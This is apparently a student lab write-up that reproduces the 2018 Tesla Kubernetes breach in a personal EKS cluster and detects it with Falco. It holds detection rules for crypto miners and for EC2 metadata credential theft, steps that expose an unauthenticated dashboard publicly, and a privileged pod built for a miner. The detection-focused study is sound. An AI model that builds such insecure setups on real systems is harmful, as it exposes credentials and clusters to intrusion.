As part of this task I was required to map the Tesla data breach to the MITRE ATT&CK framework, select two specific techniques from the incident, and replicate both on a proof-of-concept basis to demonstrate my understanding of the selected techniques.
Falco Detection Rule | Description | Event Source | MITRE ATT&CK Tactic |
---|---|---|---|
Terminal Shell in Container | A shell was used as the entrypoint/exec point into a container with an attached terminal. | Host System Calls | Execution |
Detect crypto miners using the Stratum protocol | Miners typically specify the mining pool to connect to with a URI that begins with stratum+tcp | Host System Calls | Execution, Command & Control |
Detect outbound connections to common miner pool ports | Miners typically connect to mining pools on common ports. | Host System Calls | Execution, Command & Control |
Mining Binary Detected | Malicious script or binary detected within pod or host. This rule will be triggered by the execve syscall | Host System Calls | Persistence |
List AWS S3 Buckets | Detect listing of all S3 buckets. In the case of Tesla, those buckets contained sensitive data such as passwords, tokens and telemetry data. | AWS Cloudtrail Audit Logs | Credential Access |
Contact EC2 Instance Metadata Service From Container | Detect attempts to contact the EC2 instance metadata service from within a container, a common route to stealing the node's IAM credentials. | Host System Calls | Lateral Movement |
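As a rough sketch of the logic behind the miner-pool-port rule above: a destination port is checked against a known list. The port list here is illustrative only, not the exact list shipped with the Falco rule.

```shell
# Illustrative list of common mining pool ports (assumption, not Falco's exact list)
miner_ports="3333 4444 5555 7777 14433 45700"

# Return success if the given destination port is in the miner port list
is_miner_port() {
  local port=$1
  for p in $miner_ports; do
    [ "$p" = "$port" ] && return 0
  done
  return 1
}

is_miner_port 14433 && echo "ALERT: outbound connection to common miner pool port"
is_miner_port 443 || echo "ok: 443 not in miner port list"
```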
I first had to set up an AWS CLI profile in order to interact with AWS services from my local workstation:
aws configure --profile nigel-aws-profile
export AWS_PROFILE=nigel-aws-profile
aws sts get-caller-identity --profile nigel-aws-profile
aws eks update-kubeconfig --region eu-west-1 --name tesla-cluster
Once the AWS CLI was configured, I created a one-node AWS EKS cluster using the eksctl CLI tool. Notice how I use the date command purely to confirm when those actions were performed:
date
eksctl create cluster --name tesla-cluster --node-type t3.xlarge --nodes 1 --nodes-min 0 --nodes-max 3 --max-pods-per-node 58
Once the cluster is successfully spun up, I can scale it down to zero nodes to bring my cloud compute costs down to $0 until I'm ready to do actual work:
date
eksctl get cluster
eksctl get nodegroup --cluster tesla-cluster
eksctl scale nodegroup --cluster tesla-cluster --name ng-64004793 --nodes 0
![Screenshot 2023-10-29 at 12 02 04](https://private-user-images.githubusercontent.com/126002808/278869188-a9d689b7-bb67-4f4a-a1c7-2e0a5c63e806.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc4ODY5MTg4LWE5ZDY4OWI3LWJiNjctNGY0YS1hMWM3LTJlMGE1YzYzZTgwNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1jOGM0M2M1M2E5NDdlMjhkMjU4ZTVjMDYwNTlmMjYzYzMxNGFiYjAzZDhjNjNhNDJjMWEyMmFlNGU5ZTI2YzgyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.ut1tK_rVJqf8-0bsSycEXAIxz86KdA0fN5ePgEoYIrg)
Kubernetes Dashboard is a general purpose, web-based UI for Kubernetes clusters.
It allows users to manage applications running in the cluster and troubleshoot them, as well as manage the cluster itself.
When Kubernetes dashboard is installed using the recommended settings, both authentication and HTTPS are enabled. Sometimes, organizations like Tesla choose to disable one or both.
For example, if the dashboard is served behind a proxy that performs its own authentication, enabling authentication on the dashboard itself may be seen as unnecessary.
The dashboard also uses auto-generated certificates for HTTPS, which can cause problems for HTTP clients trying to access it.
The below YAML manifest is pre-packaged to provide an insecure dashboard with authentication and HTTPS both disabled:
kubectl apply -f https://vividcode.io/content/insecure-kubernetes-dashboard.yml
Still experiencing issues exposing the dashboard via port forwarding:
kubectl port-forward svc/kubernetes-dashboard -n kubernetes-dashboard 8443 --insecure-skip-tls-verify
The above manifest is a modified version of the Kubernetes dashboard deployment: it removes the --auto-generate-certificates argument and adds some extra arguments:
- --enable-skip-login
- --disable-settings-authorizer
- --enable-insecure-login
- --insecure-bind-address=0.0.0.0
![Screenshot 2023-10-21 at 12 41 45](https://private-user-images.githubusercontent.com/126002808/277105972-e2e3ec87-52fc-4799-aec8-c2e733d1e490.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTA1OTcyLWUyZTNlYzg3LTUyZmMtNDc5OS1hZWM4LWMyZTczM2QxZTQ5MC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iNWNmYjI2MDBiZjMxMzZhNmQ1ZTY0MjgxOTRiODNhNDExNTRiMTJiNTI4NzlhMmI1NjllNjQ3MGZkMTRiNmQ2JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.9HIVgaR32D_aCovlgPtznODa-SmJBjjd3Fj8W58fUis)
After this change, the Kubernetes dashboard server starts on port 9090 for HTTP.
The manifest also modifies the livenessProbe to use HTTP as the scheme and 9090 as the port.
The kubectl proxy command starts a proxy to the Kubernetes API server, and the dashboard should then be accessible at
http://localhost:8001/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/.
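The proxy command itself was not shown above; kubectl proxy listens on localhost:8001 by default, and the dashboard URL is built from the namespace plus the service's scheme:name:port-name triple, as this small sketch illustrates:

```shell
# Start a local proxy to the API server (runs in the foreground):
#   kubectl proxy
# The dashboard is then reached through the API server's service-proxy path:
ns="kubernetes-dashboard"
svc="https:kubernetes-dashboard:"   # scheme:service-name:port-name (port name empty here)
url="http://localhost:8001/api/v1/namespaces/${ns}/services/${svc}/proxy/"
echo "$url"
```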
![Screenshot 2023-10-21 at 12 49 34](https://private-user-images.githubusercontent.com/126002808/277106267-f10d9bbc-999d-49df-9766-e917b2c36716.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTA2MjY3LWYxMGQ5YmJjLTk5OWQtNDlkZi05NzY2LWU5MTdiMmMzNjcxNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01ZjgwOWU4Mzg3MTY5OGIwZjc4N2I0NjlkMDhmOWI0YzhjOThiYWIyZTMwMzRlMTVkZTU1NDQ1M2EwYjIxYzkwJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.OjcRCqE6XWvLknZGFynZbcERGk8n1C3ZRjCB8doiLsI)
However, I received the below error at proxy address:
"message": "no endpoints available for service \"https:kubernetes-dashboard:\""
![Screenshot 2023-10-21 at 12 48 29](https://private-user-images.githubusercontent.com/126002808/277106613-06cfc246-5c1f-4d31-9e1b-380ce5231156.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTA2NjEzLTA2Y2ZjMjQ2LTVjMWYtNGQzMS05ZTFiLTM4MGNlNTIzMTE1Ni5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1lYTMzMzM2NWQ5ZTE2NTU0NGJhZTNhMTA3NzVjNTMzNGY4ZDUyYTRlNmQ0MmRmOGIwMGVmYjE1N2U1ZmJlMWI0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.W4q96p8ahGNHHAX1Qs27zTDG78zqJ0SyCZgJm2V8xYM)
Port 9090 is added as the containerPort. Similarly, the Kubernetes Service abstraction for the dashboard exposes port 80 and uses 9090 as the target port. Accessing the dashboard at http://localhost:8001/
shows all associated paths, and it's quite easy to harvest credentials from these paths:
![Screenshot 2023-10-21 at 12 58 57](https://private-user-images.githubusercontent.com/126002808/277106794-0e7847ce-3d39-42f5-a0f9-9d7999bb56d7.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTA2Nzk0LTBlNzg0N2NlLTNkMzktNDJmNS1hMGY5LTlkNzk5OWJiNTZkNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0wMDIwNGY4NDUwNmM0ZjJmODc5OGQ3ZDJhNTg1Nzk1YmM3MTM2MjQwMTI3YjFjMTZlZDgwYjcwY2JhOTE3NTdiJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.2tgtA5wyXj3XKpeDmjDKfjasqLqhimwX-aZRI-ueEXI)
We can even see the underlying EC2 instance associated with the Kubernetes cluster. The eu-west-1 prefix denotes the AWS Region (Ireland) where I installed the EC2 instance, and the private IP address of the VM is also present in the name:
![Screenshot 2023-10-21 at 13 02 09](https://private-user-images.githubusercontent.com/126002808/277106946-614a26d5-a834-4a72-a6a9-b9855e4efa31.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTA2OTQ2LTYxNGEyNmQ1LWE4MzQtNGE3Mi1hNmE5LWI5ODU1ZTRlZmEzMS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mNWIxNzc0MGFkMTNiZDM5MTRhMGM5Y2FkNGNkNDEwZjc4ZTU4NTAyOTM5NDA5MjJlMmU0Y2JiNmI3MWMxNGY3JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.e57JdVk_DDfaMKG7wgZUhB8RlLXHzGNMzE9GIrnzK20)
The IP address in the previous OIDC screenshot does not match the private IP of my EC2 instance on AWS. I will come back to this later to understand how that OIDC address is used for single sign-on:
![Screenshot 2023-10-21 at 13 07 53](https://private-user-images.githubusercontent.com/126002808/277107235-a1aa21a2-3e7f-426c-a206-f850a85733bd.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTA3MjM1LWExYWEyMWEyLTNlN2YtNDI2Yy1hMjA2LWY4NTBhODU3MzNiZC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1jY2I4OGNlODc5ZDQ4M2M1NzUwYzNlZjg1OWRjOTViM2FhODVkZWE2MDM4ZjQwYTA2ZjNiNzdkYTdlZDI0OWExJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.u5ulEUIvd5fGMi0maHlZC1JGVuIWK0bx37rGOEVkzyU)
Either way, I modified the original deployment manifest to make sure the dashboard is exposed through a LoadBalancer service.
This way, AWS automatically assigns a public IP address for the dashboard service, allowing it to be accessed publicly:
kubectl apply -f https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/public-dashboard.yaml
![Screenshot 2023-10-21 at 13 23 54](https://private-user-images.githubusercontent.com/126002808/277107841-8013ee39-1b8e-4147-8179-1e84f590db89.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTA3ODQxLTgwMTNlZTM5LTFiOGUtNDE0Ny04MTc5LTFlODRmNTkwZGI4OS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT04MWM4YjY4ZjM4NWU3MTQxNjllYzExYTBkNWFkYWI1YjhjYWFlN2RiNDNhZThiN2U5ZTFlYjQ2N2MzZmU1MDI5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.jrOMo7BshL-2GG3b0r9UfO9AuQExshzSztJrG6uIaGI)
Proof that the load balancer service was created in AWS automatically.
However, there seem to be some health-check issues preventing me from accessing the dashboard.
![Screenshot 2023-10-21 at 13 36 52](https://private-user-images.githubusercontent.com/126002808/277108432-73b8c33f-c7da-4fc3-a2ff-040a7d083453.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTA4NDMyLTczYjhjMzNmLWM3ZGEtNGZjMy1hMmZmLTA0MGE3ZDA4MzQ1My5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT03ODFkYTIwYjMzZGMwNzliODJjNWZmYWJhOTg4Yjc1NjYyOTU3ZWQ4YjM2OTI5ZjAwZjdmMWFhNTBhYzZlZjQ0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.Pz3EM-tOB83dEaTnAkZPpVIO5y7fcmmVHuRSEuXfa9Q)
After you have done this, when the Kubernetes dashboard is opened, you can click Skip on the login page to bypass authentication and go straight to the dashboard.
![kubernetes_dashboard_skip](https://private-user-images.githubusercontent.com/126002808/277037437-ba26d2c0-304e-49d7-86d9-64b8a368b05e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MDM3NDM3LWJhMjZkMmMwLTMwNGUtNDlkNy04NmQ5LTY0YjhhMzY4YjA1ZS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT03NTM4MDYzYjUwYjVmNWQ4NGRhODI3NjgyODQ1MzkyNTVhZTcxYTE4NzNmZTU5NTQ3OWMzYmQ4MjQ2MTM3YzYwJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.kyYcJ-CGg9hw4FrAzt0G8c7vvu2Kng3XaRp-RL1JONM)
- Kubernetes Web UI Activation without Authentication
- Skipping login allows users to have unrestricted access
- Bypassing authentication for the local Kubernetes Cluster Dashboard
Installed Falco via Helm using the --set tty=true flag to ensure events are flushed in real time.
By default, only the stable rules are loaded by Falco; you can install the sandbox or incubating rules by referencing them in the Helm chart:
https://falco.org/docs/reference/rules/default-rules/
Remove the existing Falco installation with stable rules:
helm uninstall falco -n falco
Install Falco again with the modified falco-sandbox_rules.yaml
referenced from my own Github repository:
https://github.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/blob/main/rules/falco-sandbox_rules.yaml
I'm enabling the ```incubating``` and ```sandbox``` rules for the purpose of this assignment:
helm install falco -f mitre_rules.yaml falcosecurity/falco --namespace falco \
--create-namespace \
--set tty=true \
--set auditLog.enabled=true \
--set falcosidekick.enabled=true \
--set falcosidekick.webui.enabled=true \
--set collectors.kubernetes.enabled=true \
--set falcosidekick.webui.redis.storageEnabled=false \
--set "falcoctl.config.artifact.install.refs={falco-incubating-rules:2,falco-sandbox-rules:2}" \
--set "falcoctl.config.artifact.follow.refs={falco-incubating-rules:2,falco-sandbox-rules:2}" \
--set "falco.rules_file={/etc/falco/falco-incubating_rules.yaml,/etc/falco/falco-sandbox_rules.yaml}"
kubectl get pods -n falco -o wide
![Screenshot 2023-11-03 at 16 47 25](https://private-user-images.githubusercontent.com/126002808/280358235-efff769d-a034-4a37-a729-d9f61c9ea74f.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjgwMzU4MjM1LWVmZmY3NjlkLWEwMzQtNGEzNy1hNzI5LWQ5ZjYxYzllYTc0Zi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0wODYxYjhlMWNiNmM5MTkxNmE4YzRkMWY2NTkwMGMyZGQ1MmU5YmYyYTdkYzRmMDI0MjJmOGYyNTQ1OWE0MTVjJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.ddAaPveSrqgmaI2nHPp9sfKAhM5Vbz4SW9KeTcZk0Ss)
- Where the option falcoctl.config.artifact.install.refs governs which rules are downloaded at startup, falcoctl.config.artifact.follow.refs identifies which rules are automatically updated, and falco.rules_file indicates which rules are loaded by the engine.
Alternatively, I can just edit the ConfigMap manually (and this might be easier in the end):
kubectl edit cm falco-rules -n falco
I can inject custom rules via the working-rules.yaml manifest:
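A custom rule file follows the standard Falco rule shape shown below. The rule body here is a hypothetical illustration of that shape, not the actual contents of working-rules.yaml.

```shell
# Write an illustrative custom Falco rule (the rule itself is an assumption)
cat <<'EOF' > /tmp/working-rules.yaml
- rule: Terminal Shell in Tesla App
  desc: A shell was spawned with an attached terminal inside the tesla-app pod
  condition: spawned_process and container and proc.name in (bash, sh) and proc.tty != 0
  output: Shell spawned in container (user=%user.name container=%container.name cmd=%proc.cmdline)
  priority: WARNING
  tags: [mitre_execution]
EOF
grep -c '^- rule:' /tmp/working-rules.yaml
```

A file in this shape can then be passed to the chart via `--set-file customRules` or merged into the falco-rules ConfigMap.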
I successfully deployed Falco and the associated dashboard.
As seen in the below screenshot, the pods may go through some crash/restart status changes before running correctly (expected here, since no priority class is set):
![Screenshot 2023-10-27 at 11 43 33](https://private-user-images.githubusercontent.com/126002808/278619383-91fa6653-3e9c-4b2c-8263-bf12a78d61f4.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc4NjE5MzgzLTkxZmE2NjUzLTNlOWMtNGIyYy04MjYzLWJmMTJhNzhkNjFmNC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zMDJhMzg3YzIxZjdmMTFiZDkzYmNhNzA2NGE2MjVjNjU0MzdiMTkzOTg2NTMzYmZhODU4OTZiNGY1OWNmZDg1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.dIQyq4WCirB4bSNudIdJcDyhb49O2qbm8qo5Xaxw-YQ)
Finally, port-forward the Falco Sidekick UI from my MacBook:
kubectl port-forward svc/falco-falcosidekick-ui -n falco 2802 --insecure-skip-tls-verify
Forwarding from 127.0.0.1:2802 -> 2802 Forwarding from [::1]:2802 -> 2802 Handling connection for 2802
![Screenshot 2023-10-27 at 11 56 17](https://private-user-images.githubusercontent.com/126002808/278621682-eaaace2f-2aaf-4c8c-bd1e-9862ea5b7213.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc4NjIxNjgyLWVhYWFjZTJmLTJhYWYtNGM4Yy1iZDFlLTk4NjJlYTViNzIxMy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1lYWMyZWEzODQzNTA3NWU5ZmIzNTlhY2Q2YmI5MGYxMTYzZGQ5MjU3YmY3MzY2NTJkNjdhZjFkZjdmODg0ZGQxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.ZruuyYBnQ-Qx9CyAUQuixwEAUpg8iibp3rVpFKhSHqw)
Create an insecure containerized workload with privileged=true
to give unrestricted permissions for the miner:
kubectl apply -f https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/tesla-app.yaml
Shell into the newly, over-privileged workload:
kubectl exec -it tesla-app -- bash
![Screenshot 2023-10-27 at 12 02 09](https://private-user-images.githubusercontent.com/126002808/278622990-ceb56366-359d-4af7-9f3a-c81d2e8485aa.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc4NjIyOTkwLWNlYjU2MzY2LTM1OWQtNGFmNy05ZjNhLWM4MWQyZTg0ODVhYS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01ZjIyMjkxMzJhYmYyNWNiM2M5YjNlMDhjYWZjYTY4MDYzMDg0YjQ2YjE1OWY3YTllMGFiNmQ4MzU0YTNhODY4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.FIcNZ53ePwNdcGeFUFEzVKhrkfzsZMkJG_8ex9wXf-Q)
To test the IDS/SOC tool, I perform one insecure behaviour in tab 1 while checking for the Falco log event in tab 2:
kubectl logs -f --tail=0 -n falco -c falco -l app.kubernetes.io/name=falco | grep 'tesla-app'
